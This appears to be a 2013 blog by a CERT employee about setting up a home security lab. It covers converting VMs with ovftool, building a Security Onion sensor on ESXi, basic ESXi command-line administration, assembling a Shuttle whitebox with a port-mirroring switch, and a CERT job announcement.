I decided the best way to use vSphere would be to copy my Windows 7 VM from my laptop to the ESXi host. Trying to scp the VM then adding it to the inventory never worked properly. I had similar problems when trying to scp a CentOS VM from my laptop. When I tried browsing the datastore in vSphere and adding a local machine to the remote inventory, it would get partway through and then fail with an I/O error. I believe this was all actually a case of a flaky wireless access point, but even in cases where I successfully copied the CentOS VM I got errors when trying to add it to the inventory.

I eventually got it to work by converting the VM locally using ovftool and then deploying it to ESXi. OVF is the Open Virtualization Format, an open standard for packaging virtual machines. The syntax to convert an existing VM is simple. First, make sure the VM is powered down rather than just suspended. On OS X running VMware Fusion, you can export a VM easily.

~ nr$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/
~ nr$ ./ovftool -dm=thin ~/Documents/Virtual\ Machines.localized/Windows\ 7\ x64.vmwarevm/Windows\ 7\ x64.vmx ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf

After the conversion, the VM still needed to be exported to the ESXi host. I plugged my laptop into a wired connection to speed the process and eliminate any issues I was having over wireless, then sent the VM to ESXi. The options I used set the datastore, disk mode, and network.

~ nr$ ./ovftool -ds=vmstore0 -dm=thin --network="VM Network 2" ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf vi://

Once the VM is copied to the host, you still need to browse the datastore and add the VM to the ESXi inventory. Other ways of moving a VM to ESXi are not endorsed by VMware; they officially recommend using OVF to import VMs.

All things considered, getting ESXi installed and configured was relatively easy. There are certainly drawbacks to using unsupported hardware. For example, vSphere does not display CPU temperature and other health or status information. I believe ESXi expects to use IPMI for hardware status like voltages, temperatures, and more. There are options to consider for anyone wanting a home lab using supported hardware. VMware maintains a lengthy HCL and I presume systems on their list support all the health status information in vSphere. I did find several possibilities to buy used servers like a Dell PowerEdge 2950 at reputable sites for about $650. Since I didn't want the noise, don't have a rack, and may not keep the system as a dedicated ESXi host, I did not go that route for a lab system.

Building a Security Onion VM

As stated, the first VM I built was Security Onion. I did this through the vSphere client and include some screenshots here. Most of this applies to building any VM using vSphere.

After choosing the option to create a new VM, I selected a custom configuration. I named the VM simply "Security Onion" and chose my only datastore, vmstore0, as the storage location. I am not concerned with backwards compatibility, so I chose "Virtual Machine Version 8." I chose one core and one socket for the CPU but allocated 4GB of RAM, since I knew the combination of Suricata, Bro, and other monitoring processes would eat a lot of RAM. I was installing a 64-bit OS, so I chose 64-bit Ubuntu as the Linux version.
Choosing the number of NICs, network, and
adapter to use when initially configuring the VM
I selected two NICs, both using VMXNET 3, which was probably the first non-standard selection in my custom configuration. I wanted to make sure I had separate management and promiscuous-mode NICs since this will be a sensor. Note that VMXNET 3 is not offered as a choice if the OS you selected earlier in the process doesn't support it.

I next chose LSI Logic SAS for the SCSI controller. Although I think it won't matter for Ubuntu, note the following from VMware's local help files.
"The LSI Logic Parallel adapter and the LSI Logic SAS adapter offer equivalent performance. Some guest operating system vendors are phasing out support for parallel SCSI in favor of SAS, so if your virtual machine and guest operating system support SAS, choose LSI SAS to maintain future compatibility."
This is a good time to point out that hitting the "Help" button in vSphere will open the local help files in your browser, and they contain actual useful information about the differences in choices when configuring the VM. In the case of the help button during the process of creating a new VM, it will actually open the specific page that is contextually useful for the options on the current step of the process. In general, both their help files and the Knowledge Base seem quite useful.

Finally, I created the virtual disk. This includes deciding whether to thin provision, thick provision lazy zeroed, or thick provision eager zeroed, the last meaning the disk is fully allocated and zeroed ahead of time. The documentation states that eager zeroing supports clustering features for fault tolerance. I chose thick provisioning for my Security Onion VM since I knew with certainty that the virtual disk would fill with NSM data like packet captures and logs. There are a number of KB and blog posts on the VMware site detailing the advantages and disadvantages of the different provisioning methods.
The final settings for my Security Onion VM

Once the VM was configured on ESXi, I still needed to actually install Security Onion. You can do it the old-fashioned way by burning a disc and using the CD/DVD drive, but I mounted the ISO instead. To do this, you just start the VM, which doesn't yet have an OS, then open a console in vSphere and click the button to mount the ISO in the virtual CD drive so the VM boots to the disc image and starts the installation process. The vSphere console is a similar view and interface to Fusion or Workstation, and mounting the ISO works essentially the same way.

The time from hitting the button to create a VM to having a running Security Onion sensor was quite short. I had a couple of small problems after the initial installation. First, in ESXi you have to manually go to the NIC settings and check a box that allows it to sniff all the traffic. My sniffing interface was initially not seeing the traffic when I checked with tcpdump, which made me realize it was probably not yet in promiscuous mode.

Second, the 4GB of RAM and one CPU I had initially allocated were insufficient. When the sensor was running and I tried to update Ubuntu, the system became very unresponsive. I eventually doubled the RAM to 8GB and the number of cores to two, which resolved the issue. I could probably drop back down to 4GB of RAM at this point, but since the system has 32GB I don't need to worry about it yet.

Other ESXi Notes

Although ESXi is stripped pretty bare of common Linux utilities and commands, there is plenty you can do from a command line through SSH instead of using vSphere. For example, to list all VMs on the system, power on my Windows 7 VM, and find the IP address so I can connect through RDP:

# vim-cmd vmsvc/getallvms
Vmid        Name                            File                           Guest OS       Version   Annotation
1      Security Onion   [vmstore0] Security Onion/Security Onion.vmx   ubuntu64Guest      vmx-08              
13     Windows 7 x64    [vmstore0] Windows 7 x64/Windows 7 x64.vmx     windows7_64Guest   vmx-09              
6      CentOS 64-bit    [vmstore0] CentOS 64-bit/CentOS 64-bit.vmx     centos64Guest      vmx-08 
~ # vim-cmd vmsvc/power.on 13
~ # vim-cmd vmsvc/get.guest 13 | grep -m 1 ipAddress
   ipAddress = "",

I can also get SMART information from my hard drive if needed.

~ # esxcli storage core device list
   Display Name: Local ATA Disk (t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF)
   Has Settable Display Name: true
   Size: 953869
   Device Type: Direct-Access 
   Multipath Plugin: NMP
   Devfs Path: /vmfs/devices/disks/t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
   Vendor: ATA     
   Model: ST1000DM003-1CH1
   Revision: CC44
   SCSI Level: 5
   Is Pseudo: false
   Status: on
   Is RDM Capable: false
   Is Local: true
   Is Removable: false
   Is SSD: false
   Is Offline: false
   Is Perennially Reserved: false
   Queue Full Sample Size: 0
   Queue Full Threshold: 0
   Thin Provisioning Status: unknown
   Attached Filters: 
   VAAI Status: unknown
   Other UIDs: vml.01000000002020202020202020202020205a31443347484b46535431303030
   Is Local SAS Device: false
   Is Boot USB Device: false

~ # esxcli storage core device smart get -d t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF
Parameter                     Value  Threshold  Worst
----------------------------  -----  ---------  -----
Health Status                 OK     N/A        N/A  
Media Wearout Indicator       N/A    N/A        N/A  
Write Error Count             N/A    N/A        N/A  
Read Error Count              115    6          99   
Power-on Hours                100    0          100  
Power Cycle Count             100    20         100  
Reallocated Sector Count      100    10         100  
Raw Read Error Rate           115    6          99   
Drive Temperature             32     0          40   
Driver Rated Max Temperature  68     45         65   
Write Sectors TOT Count       200    0          200  
Read Sectors TOT Count        N/A    N/A        N/A  
Initial Bad Block Count       100    99         100  

There is a lot more you can do from the ESXi command line interface, but I should emphasize again that it is stripped fairly bare and lacks many of the commands you would expect coming from a Linux or Unix background. Even some of the utilities that are available do not have all the options or functionality you would expect. The CLI commands generally list options or help when run without arguments, and you can also get plenty of CLI documentation from VMware.

Next Steps

I now have a number of VMs installed, including a CentOS snapshot, FreeBSD, and my Windows 7 VM. My next steps will include setting up some VLANs to have some fun with a vulnerable network and an attacker network that will include Kali Linux. I am intimately familiar with Sguil and some of the other tools in Security Onion, but also hope to dig into Suricata and Bro more than I have in the past.

I also hope that my lab will provide some interesting material for future blog posts.

04 April, 2013

New Home Lab Configuration

I received all my new equipment for my home lab a couple of days ago. After setting up the hardware in less than a day, I'm quite happy with it so far.

I was lucky enough to have two 12-year-olds assist me when I assembled the computer. This was their first time assembling a computer from parts and they really enjoyed it.

The first component was the Shuttle SH67H3. My friend Richard recommended the DS61, but I had two main problems with that barebones system. First, it only has two RAM slots for a maximum of 16GB. That's not bad, but I decided I wanted to get a desktop that supported more RAM without going to server components while keeping the form factor small. I actually may have a second system on my purchase list for sometime this year, and in that case I would definitely consider the DS61.

Second, I had read that the SH67H3 worked as an ESXi whitebox. Overall, I am a fan of Shuttle barebones. The SH67H3 is essentially the same chassis my coworkers and I used on our lab network at a previous job, just with a new motherboard and other improvements. I used very similar or identical parts for my Shuttle as the ones listed in the ESXi whitebox link above.

When we popped the case open, it all looked pretty familiar and I explained the various pieces to the 12-year-olds. We removed the fan and heat sink array, which is a pretty nice low-noise setup. The case fan actually slides over the second heat sink so air blows over it on the way out the back of the chassis.
Don't forget to remove both the sticker from the heatsink and the plastic film that is on the CPU load plate before putting the CPU in the socket. After we inserted the Intel Core i7 2600, we applied thermal paste, reattached the passive cooling, and finally reattached the fan including plugging it back into the motherboard. We also inserted the four 8GB RAM sticks.
Shuttle SH76H3 motherboard with CPU and RAM installed
The fan slides over the heat sink at the rear of the chassis on the left
Next, we put the DVD/CD drive and hard drive into the tray, attached the tray to the chassis, and connected the SATA and power cables. I also added a dual Intel PRO/1000 PT NIC for a total of three physical network interfaces. Finally, we tested the system and everything appeared to be working.

New Network Architecture

Since I was going to all this trouble for a relatively powerful computer compared to my three old Pentium III servers, I decided to take the opportunity to make a couple of other network changes. I used to run my network sensor inline, but along with the new computer I purchased a Netgear GS108T-200 smart switch. This switch has an abundance of features, including VLANs and port mirroring. Along with the new switch, all I needed was an extra WAP to reconfigure my home network as shown below.
The router/firewall also works as a WAP, but to see most client traffic
I disabled it and connected an access point behind the mirroring switch
With this configuration, the switch mirrors traffic to a dedicated network interface on my network sensor. Only traffic that never reaches the switch will be missed on the mirror port. I can also configure VLANs on the switch if I want to segment the network by function, such as management interfaces and WiFi clients.

I plan to write more about my lab setup as I continue to redevelop it. The first thing I did after testing the new box was install ESXi and create a network sensor VM using Security Onion. I may have a post about it soon.

29 March, 2013

CERT is hiring

The company I work for is hiring. For those that don't know, CERT is part of the Software Engineering Institute at Carnegie Mellon University. CERT was created in 1988 as part of the response to the Morris worm. You can find out more on CERT's "About Us" page.

If you are interested, please read more about our hiring process and browse some of the available positions. The positions are primarily in Pittsburgh with a few openings in Arlington, VA. The open positions cover network security analysis, security architecture, malware analysis, software development, vulnerability analysis, and more.

I consider our hiring process fairly grueling but also stimulating. It gives the prospective employee and prospective coworkers a good chance to really learn whether the relationship will work. It is an opportunity not just for the candidate to be interviewed, but also for the candidate to interview those who already work at CERT.

One of the reasons we have so many vacant positions is that we try to maintain high standards when considering candidates. Most of our positions require a fair amount of experience and expertise. My colleagues are smart, diligent, and largely enthusiastic about their chosen professions. Don't get me wrong -- we still have bad days when we are less enthusiastic or unhappy about the state of information security, but this is a pretty cool place to work. We do a wide variety of both research and more operationally focused work, tackling a lot of big problems. We also get a fair amount of freedom to find interesting and challenging areas of work.

If I know you or know of your work, please contact me about using my name as a referral. A referral from a current CERT employee can be helpful when applying. The best way to contact me regarding a referral or to ask other questions is via email or LinkedIn. You can also post questions more publicly here on my blog if it seems appropriate. In the interest of disclosure, I have an interest in recruiting people I would want to work with, but I could also potentially receive a referral bonus if you list me when you apply.